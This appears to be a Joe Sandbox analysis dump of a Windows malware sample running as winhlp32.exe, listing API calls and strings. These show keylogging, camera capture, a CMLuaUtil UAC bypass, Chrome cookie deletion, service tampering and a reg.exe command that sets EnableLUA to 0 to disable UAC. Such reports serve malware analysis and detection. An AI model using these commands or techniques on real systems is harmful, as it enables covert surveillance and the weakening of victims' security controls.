                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\winhlp32.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\winhlp32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-1839853256
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • UserProfile, xrefs: 0040BAAD
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\winhlp32.exe
                                    • API String ID: 0-1895770939
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
